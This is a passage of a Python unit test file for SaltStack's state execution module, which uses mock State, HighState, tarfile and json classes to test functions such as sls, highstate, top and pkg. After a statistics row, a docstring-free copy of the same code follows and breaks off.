Mock verify_tops method
'''
data = data
if self.flag:
return ["a", "b"]
else:
return []
@staticmethod
def top_matches(data):
'''
Mock top_matches method
'''
data = data
return ["a", "b", "c"]
@staticmethod
def push_active():
'''
Mock push_active method
'''
return True
@staticmethod
def compile_highstate():
'''
Mock compile_highstate method
'''
return "A"
@staticmethod
def compile_state_usage():
'''
Mock compile_state_usage method
'''
return "A"
@staticmethod
def pop_active():
'''
Mock pop_active method
'''
return True
@staticmethod
def compile_low_chunks():
'''
Mock compile_low_chunks method
'''
return True
def render_highstate(self, data):
'''
Mock render_highstate method
'''
data = data
if self.flag:
return ["a", "b"], True
else:
return ["a", "b"], False
@staticmethod
def call_highstate(exclude, cache, cache_name, force=None,
whitelist=None, orchestration_jid=None):
'''
Mock call_highstate method
'''
exclude = exclude
cache = cache
cache_name = cache_name
force = force
whitelist = whitelist
return True
class MockSerial(object):
'''
Mock Class
'''
def __init__(self):
pass
class Serial(object):
'''
Mock Serial class
'''
def __init__(self, data):
data = data
@staticmethod
def load(data):
'''
Mock load method
'''
data = data
return {"A": "B"}
@staticmethod
def dump(data, data1):
'''
Mock dump method
'''
data = data
data1 = data1
return True
class MockTarFile(object):
'''
Mock tarfile class
'''
path = os.sep + "tmp"
def __init__(self):
pass
@staticmethod
def open(data, data1):
'''
Mock open method
'''
data = data
data1 = data1
return MockTarFile
@staticmethod
def getmembers():
'''
Mock getmembers method
'''
return [MockTarFile]
@staticmethod
def extractall(data):
'''
Mock extractall method
'''
data = data
return True
@staticmethod
def close():
'''
Mock close method
'''
return True
class MockJson(object):
'''
Mock json class
'''
flag = None
def __init__(self):
pass
def load(self, data, object_hook=None):
'''
Mock load method
'''
data = data
object_hook = object_hook
if self.flag:
return [True]
else:
return [{"test": ""}]
@skipIf(NO_MOCK, NO_MOCK_REASON)
class StateTestCase(TestCase, LoaderModuleMockMixin):
'''
Test case for salt.modules.state
'''
def setup_loader_modules(self):
utils = salt.loader.utils(
salt.config.DEFAULT_MINION_OPTS,
whitelist=['state']
)
patcher = patch('salt.modules.state.salt.state', MockState())
patcher.start()
self.addCleanup(patcher.stop)
return {
state: {
'__opts__': {
'cachedir': '/D',
'environment': None,
'__cli': 'salt',
},
'__utils__': utils,
},
}
def test_running(self):
'''
Test of checking i fthe state function is already running
'''
self.assertEqual(state.running(True), [])
mock = MagicMock(side_effect=[[{"fun": "state.running", "pid": "4126",
"jid": "20150325123407204096"}], []])
with patch.dict(state.__salt__,
{'saltutil.is_running': mock}
):
self.assertListEqual(state.running(),
['The function "state.running"'
' is running as PID 4126 and '
'was started at 2015, Mar 25 12:34:07.'
'204096 with jid 20150325123407204096'])
self.assertListEqual(state.running(), [])
def test_low(self):
'''
Test of executing a single low data call
'''
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
MockState.State.flag = False
self.assertEqual(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}), list)
MockState.State.flag = True
self.assertTrue(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
def test_high(self):
'''
Test for checking the state system
'''
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.high({"vim": {"pkg": ["installed"]}}))
mock = MagicMock(return_value={"test": True})
with patch.object(state, '_get_opts', mock):
self.assertTrue(state.high({"vim": {"pkg": ["installed"]}}))
def test_template(self):
'''
Test of executing the information
stored in a template file on the minion
'''
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = True
self.assertTrue(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = False
self.assertTrue(state.template('/home/salt/salt.sls'))
def test_template_str(self):
'''
Test for Executing the information
stored in a string from an sls template
'''
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template_str('Template String'))
self.assertTrue(state.template_str('Template String'))
def test_apply_(self):
'''
Test to apply states
'''
mock = MagicMock(return_value=True)
with patch.object(state, 'sls', mock):
self.assertTrue(state.apply_(True))
with patch.object(state, 'highstate', mock):
self.assertTrue(state.apply_(None))
def test_list_disabled(self):
'''
Test to list disabled states
'''
mock = MagicMock(return_value=["A", "B", "C"])
with patch.dict(state.__salt__, {'grains.get': mock}):
self.assertListEqual(state.list_disabled(), ["A", "B", "C"])
def test_enable(self):
'''
Test to Enable state function or sls run
'''
mock = MagicMock(return_value=["A", "B"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.enable("A"),
{'msg': 'Info: A state enabled.',
'res': True})
self.assertDictEqual(state.enable("Z"),
{'msg': 'Info: Z state already '
'enabled.', 'res': True})
def test_disable(self):
'''
Test to disable state run
'''
mock = MagicMock(return_value=["C", "D"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.disable("C"),
{'msg': 'Info: C state '
'already disabled.',
'res': True})
self.assertDictEqual(state.disable("Z"),
{'msg': 'Info: Z state '
'disabled.', 'res': True})
def test_clear_cache(self):
'''
Test to clear out cached state file
'''
mock = MagicMock(return_value=["A.cache.p", "B.cache.p", "C"])
with patch.object(os, 'listdir', mock):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'isfile', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertEqual(state.clear_cache(),
['A.cache.p',
'B.cache.p'])
def test_single(self):
'''
Test to execute single state function
'''
ret = {'pkg_|-name=vim_|-name=vim_|-installed': list}
mock = MagicMock(side_effect=["A", None, None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.single("pkg.installed",
" name=vim"), "A")
self.assertEqual(state.single("pk", "name=vim"),
"Invalid function passed")
with patch.dict(state.__opts__, {"test": "install"}):
mock = MagicMock(return_value={"test": ""})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.single,
"pkg.installed",
"name=vim",
pillar="A")
MockState.State.flag = True
self.assertTrue(state.single("pkg.installed",
"name=vim"))
MockState.State.flag = False
self.assertDictEqual(state.single("pkg.installed",
"name=vim"), ret)
def test_show_top(self):
'''
Test to return the top data that the minion will use for a highstate
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_top(), "A")
MockState.HighState.flag = True
self.assertListEqual(state.show_top(), ['a', 'b'])
MockState.HighState.flag = False
self.assertListEqual(state.show_top(), ['a', 'b', 'c'])
def test_run_request(self):
'''
Test to Execute the pending state request
'''
mock = MagicMock(side_effect=[{},
{"name": "A"},
{"name": {'mods': "A",
'kwargs': {}}}])
with patch.object(state, 'check_request', mock):
self.assertDictEqual(state.run_request("A"), {})
self.assertDictEqual(state.run_request("A"), {})
mock = MagicMock(return_value=["True"])
with patch.object(state, 'apply_', mock):
mock = MagicMock(return_value="")
with patch.object(os, 'remove', mock):
self.assertListEqual(state.run_request("name"),
["True"])
def test_show_highstate(self):
'''
Test to retrieve the highstate data from the salt master
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_highstate(), "A")
self.assertRaises(SaltInvocationError,
state.show_highstate,
pillar="A")
self.assertEqual(state.show_highstate(), "A")
def test_show_lowstate(self):
'''
Test to list out the low data that will be applied to this minion
'''
mock = MagicMock(side_effect=["A", None])
with patch.object(state, '_check_queue', mock):
self.assertRaises(AssertionError, state.show_lowstate)
self.assertTrue(state.show_lowstate())
def test_show_state_usage(self):
'''
Test to list out the state usage that will be applied to this minion
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_state_usage(), "A")
self.assertRaises(SaltInvocationError,
state.show_state_usage,
pillar="A")
self.assertEqual(state.show_state_usage(), "A")
def test_sls_id(self):
'''
Test to call a single ID from the
named module(s) and handle all requisites
'''
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.sls_id("apache", "http"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.sls_id("apache", "http"), 2)
MockState.State.flag = False
self.assertDictEqual(state.sls_id("ABC", "http"),
{'': 'ABC'})
self.assertRaises(SaltInvocationError,
state.sls_id,
"DEF", "http")
def test_show_low_sls(self):
'''
Test to display the low data from a specific sls
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_low_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.show_low_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_low_sls("foo"),
[{'__id__': 'ABC'}])
def test_show_sls(self):
'''
Test to display the state data from a specific sls
'''
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.show_sls,
"foo",
pillar="A")
MockState.State.flag = True
self.assertEqual(state.show_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_sls("foo"),
['a', 'b'])
def test_top(self):
'''
Test to execute a specific top file
'''
ret = ['Pillar failed to render with the following messages:', 'E']
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.top("reverse_top.sls"), "A")
mock = MagicMock(side_effect=[False, True, True])
with patch.object(state, '_check_pillar', mock):
with patch.dict(state.__pillar__, {"_errors": "E"}):
self.assertListEqual(state.top("reverse_top.sls"), ret)
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(return_value={'test': True})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.top,
"reverse_top.sls",
pillar="A")
mock = MagicMock(
return_value
=
'salt://reverse_top.sls')
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(state, '_set_retcode',
mock):
self.assertTrue(
state.
top("reverse_top.sls "
"exclude=exclude.sls"))
def test_highstate(self):
'''
Test to retrieve the state data from the
salt master for the minion and execute it
'''
arg = "whitelist=sls1.sls"
mock = MagicMock(side_effect=[True, False, False, False])
with patch.object(state, '_disabled', mock):
self.assertDictEqual(state.highstate("whitelist=sls1.sls"),
{'comment': 'Disabled',
'name': 'Salt highstate run is disabled. '
'To re-enable, run state.enable highstate',
'result': 'False'})
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.highstate("whitelist=sls1.sls"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(return_value={'test': True})
with patch.object(state, '_get_opts', mock):
self.assertRaises(SaltInvocationError,
state.highstate,
"whitelist=sls1.sls",
pillar="A")
mock = MagicMock(return_value=True)
with patch.dict(state.__salt__,
{'config.option': mock}):
mock = MagicMock(return_value="A")
with patch.object(state, '_filter_running',
mock):
mock = MagicMock(return_value=True)
with patch.object(state, '_filter_running',
mock):
mock = MagicMock(return_value=True)
with patch.object(salt.payload, 'Serial',
mock):
with patch.object(os.path,
'join', mock):
with patch.object(
state,
'_set'
'_retcode',
mock):
self.assertTrue(state.
highstate
(arg))
def test_clear_request(self):
'''
Test to clear out the state execution request without executing it
'''
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.payload, 'Serial', mock):
mock = MagicMock(side_effect=[False, True, True])
with patch.object(os.path, 'isfile', mock):
self.assertTrue(state.clear_request("A"))
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertTrue(state.clear_request())
mock = MagicMock(return_value={})
with patch.object(state, 'check_request', mock):
self.assertFalse(state.clear_request("A"))
def test_check_request(self):
'''
Test to return the state request information
'''
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock), \
patch('salt.modules.state.salt.payload', MockSerial):
mock = MagicMock(side_effect=[True, True, False])
with patch.object(os.path, 'isfile', mock):
with patch('salt.utils.files.fopen', mock_open()):
self.assertDictEqual(state.check_request(), {'A': 'B'})
with patch('salt.utils.files.fopen', mock_open()):
self.assertEqual(state.check_request("A"), 'B')
self.assertDictEqual(state.check_request(), {})
def test_request(self):
'''
Test to request the local admin execute a state run
'''
mock = MagicMock(return_value=True)
with patch.object(state, 'apply_', mock):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=
{"test_run": "",
"mods": "",
"kwargs": ""})
with patch.object(state, 'check_request', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
with patch.object(salt.utils.platform, 'is_windows', mock):
with patch.dict(state.__salt__, {'cmd.run': mock}):
with patch('salt.utils.files.fopen', mock_open()):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
self.assertTrue(state.request("A"))
def test_sls(self):
'''
Test to execute a set list of state files from an environment
'''
arg = "core,edit.vim dev"
ret = ['Pillar failed to render with the following messages:', 'E', '1']
mock = MagicMock(return_value=True)
with patch.object(state, 'running', mock):
with patch.dict(state.__context__, {"retcode": 1}):
self.assertEqual(state.sls("core,edit.vim dev"), True)
mock = MagicMock(side_effect=[True, True, True, True, True, True])
with patch.object(state, '_wait', mock):
mock = MagicMock(side_effect=[["A"], [], [], [], [], []])
with patch.object(state, '_disabled', mock):
with patch.dict(state.__context__, {"retcode": 1}):
self.assertEqual(
state.sls("core,edit.vim dev",
None,
None,
True),
["A"])
mock = MagicMock(side_effect=[False,
True,
True,
True,
True])
with patch.object(state, '_check_pillar', mock):
with patch.dict(state.__context__, {"retcode": 5}):
with patch.dict(state.__pillar__, {"_errors": "E1"}):
self.assertListEqual(state.sls("core,edit.vim dev",
None,
None,
True), ret)
with patch.dict(state.__opts__, {"test": None}):
mock = MagicMock(return_value={"test": "",
"environment": None})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils,
'test_mode',
mock):
self.assertRaises(
SaltInvocationError,
state.sls,
"core,edit.vim dev",
None,
None,
True,
pillar="A")
mock = MagicMock(return_value="/D/cache.cache.p")
with patch.object(os.path,
'join',
mock):
mock = MagicMock(return_value=True)
with patch.object(os.path,
'isfile',
mock):
with patch(
'salt.utils.files.fopen',
mock_open()):
self.assertTrue(
state.sls(arg,
None,
None,
True,
cache
=True
)
)
MockState.HighState.flag = True
self.assertTrue(state.sls("core,edit"
".vim dev",
None,
None,
True)
)
MockState.HighState.flag = False
mock = MagicMock(return_value=True)
with patch.dict(state.__salt__,
{'config.option':
mock}):
mock = MagicMock(return_value=
True)
with patch.object(
state,
'_filter_'
'running',
mock):
self.sub_test_sls()
def sub_test_sls(self):
'''
Sub function of test_sls
'''
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
with patch.object(os, 'umask', mock):
mock = MagicMock(return_value=False)
with patch.object(salt.utils.platform, 'is_windows', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
with patch.object(state, '_set_retcode', mock):
with patch.dict(state.__opts__,
{"test": True}):
with patch('salt.utils.files.fopen', mock_open()):
self.assertTrue(state.sls("core,edit"
".vim dev",
None,
None,
True))
def test_pkg(self):
'''
Test to execute a packaged state run
'''
tar_file = os.sep + os.path.join('tmp', 'state_pkg.tgz')
mock = MagicMock(side_effect=[False, True, True, True, True, True, True, True])
with patch.object(os.path, 'isfile', mock), \
patch('salt.modules.state.tarfile', MockTarFile), \
patch('salt.modules.state.json', MockJson()):
self.assertEqual(state.pkg(tar_file, "", "md5"), {})
mock = MagicMock(side_effect=[False, 0, 0, 0, 0])
with patch.object(salt.utils.hashutils, 'get_hash', mock):
# Verify hash
self.assertDictEqual(state.pkg(tar_file, "", "md5"), {})
# Verify file outside intended root
self.assertDictEqual(state.pkg(tar_file, 0, "md5"), {})
MockTarFile.path = ""
MockJson.flag = True
with patch('salt.utils.files.fopen', mock_open()):
self.assertListEqual(state.pkg(tar_file, 0, "md5"), [True])
MockTarFile.path = ""
MockJson.flag = False
if six.PY2:
with patch('salt.utils.files.fopen', mock_open()), \
patch.dict(state.__utils__, {'state.check_result': MagicMock(return_value=True)}):
self.assertTrue(state.pkg(tar_file, 0, "md5"))
else:
with patch('salt.utils.files.fopen', mock_open()):
self.assertTrue(state.pkg(tar_file, 0, "md5"))
| 38.009036 | 110 | 0.425179 |
from __future__ import absolute_import
import os
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
MagicMock,
patch,
mock_open,
NO_MOCK,
NO_MOCK_REASON
)
import salt.config
import salt.loader
import salt.utils.hashutils
import salt.utils.odict
import salt.utils.platform
import salt.modules.state as state
from salt.exceptions import SaltInvocationError
from salt.ext import six
class MockState(object):
def __init__(self):
pass
class State(object):
flag = None
def __init__(self,
opts,
pillar_override=False,
pillar_enc=None,
initial_pillar=None):
pass
def verify_data(self, data):
data = data
if self.flag:
return True
else:
return False
@staticmethod
def call(data):
data = data
return list
@staticmethod
def call_high(data, orchestration_jid=None):
data = data
return True
@staticmethod
def call_template_str(data):
data = data
return True
@staticmethod
def _mod_init(data):
data = data
return True
def verify_high(self, data):
data = data
if self.flag:
return True
else:
return -1
@staticmethod
def compile_high_data(data):
data = data
return [{"__id__": "ABC"}]
@staticmethod
def call_chunk(data, data1, data2):
data = data
data1 = data1
data2 = data2
return {'': 'ABC'}
@staticmethod
def call_chunks(data):
data = data
return True
@staticmethod
def call_listen(data, ret):
data = data
ret = ret
return True
def requisite_in(self, data):
return data, []
class HighState(object):
flag = False
opts = {'state_top': '',
'pillar': {}}
def __init__(self, opts, pillar_override=None, *args, **kwargs):
self.building_highstate = salt.utils.odict.OrderedDict
self.state = MockState.State(opts,
pillar_override=pillar_override)
def render_state(self, sls, saltenv, mods, matches, local=False):
sls = sls
saltenv = saltenv
mods = mods
matches = matches
local = local
if self.flag:
return {}, True
else:
return {}, False
@staticmethod
def get_top():
return "_top"
def verify_tops(self, data):
data = data
if self.flag:
return ["a", "b"]
else:
return []
@staticmethod
def top_matches(data):
data = data
return ["a", "b", "c"]
@staticmethod
def push_active():
return True
@staticmethod
def compile_highstate():
return "A"
@staticmethod
def compile_state_usage():
return "A"
@staticmethod
def pop_active():
return True
@staticmethod
def compile_low_chunks():
return True
def render_highstate(self, data):
data = data
if self.flag:
return ["a", "b"], True
else:
return ["a", "b"], False
@staticmethod
def call_highstate(exclude, cache, cache_name, force=None,
whitelist=None, orchestration_jid=None):
exclude = exclude
cache = cache
cache_name = cache_name
force = force
whitelist = whitelist
return True
class MockSerial(object):
def __init__(self):
pass
class Serial(object):
def __init__(self, data):
data = data
@staticmethod
def load(data):
data = data
return {"A": "B"}
@staticmethod
def dump(data, data1):
data = data
data1 = data1
return True
class MockTarFile(object):
path = os.sep + "tmp"
def __init__(self):
pass
@staticmethod
def open(data, data1):
data = data
data1 = data1
return MockTarFile
@staticmethod
def getmembers():
return [MockTarFile]
@staticmethod
def extractall(data):
data = data
return True
@staticmethod
def close():
return True
class MockJson(object):
flag = None
def __init__(self):
pass
def load(self, data, object_hook=None):
data = data
object_hook = object_hook
if self.flag:
return [True]
else:
return [{"test": ""}]
@skipIf(NO_MOCK, NO_MOCK_REASON)
class StateTestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
utils = salt.loader.utils(
salt.config.DEFAULT_MINION_OPTS,
whitelist=['state']
)
patcher = patch('salt.modules.state.salt.state', MockState())
patcher.start()
self.addCleanup(patcher.stop)
return {
state: {
'__opts__': {
'cachedir': '/D',
'environment': None,
'__cli': 'salt',
},
'__utils__': utils,
},
}
def test_running(self):
self.assertEqual(state.running(True), [])
mock = MagicMock(side_effect=[[{"fun": "state.running", "pid": "4126",
"jid": "20150325123407204096"}], []])
with patch.dict(state.__salt__,
{'saltutil.is_running': mock}
):
self.assertListEqual(state.running(),
['The function "state.running"'
' is running as PID 4126 and '
'was started at 2015, Mar 25 12:34:07.'
'204096 with jid 20150325123407204096'])
self.assertListEqual(state.running(), [])
def test_low(self):
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
MockState.State.flag = False
self.assertEqual(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}), list)
MockState.State.flag = True
self.assertTrue(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
def test_high(self):
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.high({"vim": {"pkg": ["installed"]}}))
mock = MagicMock(return_value={"test": True})
with patch.object(state, '_get_opts', mock):
self.assertTrue(state.high({"vim": {"pkg": ["installed"]}}))
def test_template(self):
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = True
self.assertTrue(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = False
self.assertTrue(state.template('/home/salt/salt.sls'))
def test_template_str(self):
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template_str('Template String'))
self.assertTrue(state.template_str('Template String'))
def test_apply_(self):
mock = MagicMock(return_value=True)
with patch.object(state, 'sls', mock):
self.assertTrue(state.apply_(True))
with patch.object(state, 'highstate', mock):
self.assertTrue(state.apply_(None))
def test_list_disabled(self):
mock = MagicMock(return_value=["A", "B", "C"])
with patch.dict(state.__salt__, {'grains.get': mock}):
self.assertListEqual(state.list_disabled(), ["A", "B", "C"])
def test_enable(self):
mock = MagicMock(return_value=["A", "B"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.enable("A"),
{'msg': 'Info: A state enabled.',
'res': True})
self.assertDictEqual(state.enable("Z"),
{'msg': 'Info: Z state already '
'enabled.', 'res': True})
def test_disable(self):
mock = MagicMock(return_value=["C", "D"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.disable("C"),
{'msg': 'Info: C state '
'already disabled.',
'res': True})
self.assertDictEqual(state.disable("Z"),
{'msg': 'Info: Z state '
'disabled.', 'res': True})
def test_clear_cache(self):
mock = MagicMock(return_value=["A.cache.p", "B.cache.p", "C"])
with patch.object(os, 'listdir', mock):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'isfile', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertEqual(state.clear_cache(),
['A.cache.p',
'B.cache.p'])
def test_single(self):
ret = {'pkg_|-name=vim_|-name=vim_|-installed': list}
mock = MagicMock(side_effect=["A", None, None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.single("pkg.installed",
" name=vim"), "A")
self.assertEqual(state.single("pk", "name=vim"),
"Invalid function passed")
with patch.dict(state.__opts__, {"test": "install"}):
mock = MagicMock(return_value={"test": ""})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.single,
"pkg.installed",
"name=vim",
pillar="A")
MockState.State.flag = True
self.assertTrue(state.single("pkg.installed",
"name=vim"))
MockState.State.flag = False
self.assertDictEqual(state.single("pkg.installed",
"name=vim"), ret)
def test_show_top(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_top(), "A")
MockState.HighState.flag = True
self.assertListEqual(state.show_top(), ['a', 'b'])
MockState.HighState.flag = False
self.assertListEqual(state.show_top(), ['a', 'b', 'c'])
def test_run_request(self):
mock = MagicMock(side_effect=[{},
{"name": "A"},
{"name": {'mods': "A",
'kwargs': {}}}])
with patch.object(state, 'check_request', mock):
self.assertDictEqual(state.run_request("A"), {})
self.assertDictEqual(state.run_request("A"), {})
mock = MagicMock(return_value=["True"])
with patch.object(state, 'apply_', mock):
mock = MagicMock(return_value="")
with patch.object(os, 'remove', mock):
self.assertListEqual(state.run_request("name"),
["True"])
def test_show_highstate(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_highstate(), "A")
self.assertRaises(SaltInvocationError,
state.show_highstate,
pillar="A")
self.assertEqual(state.show_highstate(), "A")
def test_show_lowstate(self):
mock = MagicMock(side_effect=["A", None])
with patch.object(state, '_check_queue', mock):
self.assertRaises(AssertionError, state.show_lowstate)
self.assertTrue(state.show_lowstate())
def test_show_state_usage(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_state_usage(), "A")
self.assertRaises(SaltInvocationError,
state.show_state_usage,
pillar="A")
self.assertEqual(state.show_state_usage(), "A")
def test_sls_id(self):
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.sls_id("apache", "http"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.sls_id("apache", "http"), 2)
MockState.State.flag = False
self.assertDictEqual(state.sls_id("ABC", "http"),
{'': 'ABC'})
self.assertRaises(SaltInvocationError,
state.sls_id,
"DEF", "http")
def test_show_low_sls(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_low_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.show_low_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_low_sls("foo"),
[{'__id__': 'ABC'}])
def test_show_sls(self):
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.show_sls,
"foo",
pillar="A")
MockState.State.flag = True
self.assertEqual(state.show_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_sls("foo"),
['a', 'b'])
def test_top(self):
ret = ['Pillar failed to render with the following messages:', 'E']
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.top("reverse_top.sls"), "A")
mock = MagicMock(side_effect=[False, True, True])
with patch.object(state, '_check_pillar', mock):
with patch.dict(state.__pillar__, {"_errors": "E"}):
self.assertListEqual(state.top("reverse_top.sls"), ret)
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(return_value={'test': True})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.top,
"reverse_top.sls",
pillar="A")
mock = MagicMock(
return_value
=
'salt://reverse_top.sls')
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(state, '_set_retcode',
mock):
self.assertTrue(
state.
top("reverse_top.sls "
"exclude=exclude.sls"))
def test_highstate(self):
arg = "whitelist=sls1.sls"
mock = MagicMock(side_effect=[True, False, False, False])
with patch.object(state, '_disabled', mock):
self.assertDictEqual(state.highstate("whitelist=sls1.sls"),
{'comment': 'Disabled',
'name': 'Salt highstate run is disabled. '
'To re-enable, run state.enable highstate',
'result': 'False'})
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.highstate("whitelist=sls1.sls"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(return_value={'test': True})
with patch.object(state, '_get_opts', mock):
self.assertRaises(SaltInvocationError,
state.highstate,
"whitelist=sls1.sls",
pillar="A")
mock = MagicMock(return_value=True)
with patch.dict(state.__salt__,
{'config.option': mock}):
mock = MagicMock(return_value="A")
with patch.object(state, '_filter_running',
mock):
mock = MagicMock(return_value=True)
with patch.object(state, '_filter_running',
mock):
mock = MagicMock(return_value=True)
with patch.object(salt.payload, 'Serial',
mock):
with patch.object(os.path,
'join', mock):
with patch.object(
